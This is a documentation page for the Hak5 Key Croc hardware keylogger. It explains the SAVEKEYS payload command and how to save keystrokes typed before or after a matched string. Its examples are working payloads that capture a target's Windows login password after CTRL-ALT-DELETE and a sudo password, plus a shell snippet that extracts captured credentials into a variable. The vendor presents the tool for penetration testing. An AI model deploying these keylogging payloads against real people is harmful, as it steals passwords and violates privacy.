Key Croc
Search…
The Key Croc by Hak5
Getting Started
Key Croc Basics
Configuration
Files and Directory Structure
Default Settings
Getting the Key Croc Online
Configuring Cloud C²
Understanding Languages
Beginner Guides
Password Sniffing with the Key Croc — Easy, or Super Easy?
New Features in Key Croc 1.3
Payloads and Loot
Payload Primer
Getting Payloads
Activating and Deactivating Payloads
Loot
Advanced Usage
Serial Console Access
Updating the Firmware
Factory Reset
Writing Payloads
Key Croc Payload Development
The MATCH Command
The SAVEKEYS Command
The ATTACKMODE Command
Hardware ID Cloning
The QUACK Command
Advanced QUACK Commands
The LED Command
Ducky Script Commands
Command Quick Reference
Tips & Tricks
Understanding the File System
Interactive Payload Development
Installing Extras like Metasploit
Helpful Payload Snippets
Product Information
Important Safety Information and Warnings
Specifications
Powered By GitBook
The SAVEKEYS Command
SAVEKEYS allows the payload to save specific keys typed by the target when the payload has executed with a valid MATCH. SAVEKEYS can either save the LAST keys typed before a MATCH, or the NEXT keys typed after a MATCH.

SAVEKEYS /absolute/path/to/file.log [NEXT | LAST | UNTIL] N (Number of keys)

Here's a brief example of using SAVEKEYS with NEXT:
MATCH hello
SAVEKEYS /root/loot/test.log NEXT 6
Imagine the target were to type "hello world". These 11 keys (the 10 characters and 1 spacebar key press) would be saved to the keylog files. As soon as the 5th key was pressed, completing the string "hello", the above example payload would execute based on the first line MATCH statement. The second line of the payload would then instruct the framework to save the next 6 keypresses to a test.log file in /root/loot/.
In this case when the target types "hello world" the payload executes, creating a new file in /root/loot/test.log containing " world".

In addition to saving a specified number of keys to save with the NEXT parameter, SAVKEYS also features a UNTIL function (added in 1.3) which will save up to 255 keys UNTIL the specified key (regex value) is pressed.
MATCH \[CONTROL-ALT-DELETE\]
SAVEKEYS /root/loot/windows-pass.txt UNTIL \[ENTER\]
In this example, the payload begins recording keystrokes to the pass.txt file when the CONTROL-ALT-DELETE keyboard combination is pressed, and continues to record until the ENTER key is pressed.
Note the escape characters before [ and ] in these regular expressions.
MATCH sudo(.*?)\[ENTER\]
SAVEKEYS /root/loot/sudo-pass.txt UNTIL \[ENTER\]

In addition to saving the next keys typed after a MATCH, the SAVEKEYS command may be used to save the LAST keys typed before a MATCH.
To recycle our SAVEKEYS NEXT example above, we could modify with the following:
MATCH world
SAVEKEYS /root/loot/test.log LAST 7
In this case when the target types "hello world" the payload gets executed on the 11th keypress, when the MATCH "world" were completed, and the previously typed 7 keys would be saved to the /root/loot/test.log file. This would result in a log file containing "hello ".

A maximum of 128 keys may be stored with SAVEKEYS either NEXT or LAST.
SAVEKEYS requires an absolute path for the output file. It cannot take a variable.
  • SAVEKEYS /tmp/keys.txt LAST 10 – correct usage
  • SAVEKEYS $keyfile LAST 10 – incorrect usage
If SAVEKEYS is to be used in a payload, it must immediately follow a MATCH command.

MATCH hello
SAVEKEYS /root/loot/text.log NEXT 6
LED ATTACK

MATCH hello
LED ATTACK
SAVEKEYS /root/loot/test.log NEXT 6
Keys of interest saved with SAVEKEYS may be extracted systematically using text processing tools and used later as variables in a payload. It is important to note a payload will need to wait until the keys are saved – so pay special attention to the while command. For example:
# Save the next 30 keys typed after the CTRL-ALT-DELETE key combo is pressed
MATCH \[CTRL-ALT-DELETE]
SAVEKEYS /tmp/login NEXT 30
# Wait until the login file is written (30 keys are pressed)
while [ ! -f /tmp/login ]; do sleep 2; done
# Define variable of keys typed before ENTER, removing any TAB keys
CREDS=$(cat /tmp/login | sed 's/\[TAB\]//g' | awk -F'\[ENTER\]' '{print $1}')
Similar to MATCH, one should consider that SAVEKEYS is not actually a bash command but rather a Key Croc command which is interpreted by the Payload Framework. Changes to the SAVEKEYS command requires a reboot or issuing the RELOAD_PAYLOADS command. Additionally, the CHECK_PAYLOADS command will check the syntax and display the payload which will execute after the corresponding MATCH is typed by the target.
Do not use the word "SAVEKEYS" in a payload's comment as doing so will cause interpretation issues with the Key Croc payload parser.
Writing Payloads - Previous
The MATCH Command
Next - Writing Payloads
The ATTACKMODE Command
Last modified 1yr ago
Copy link
On this page
USAGE
SAVEKEYS NEXT
SAVEKEYS UNTIL
SAVEKEYS LAST
Additional SAVEKEYS Considerations
Correct SAVEKEYS usage
Incorrect SAVEKEYS usage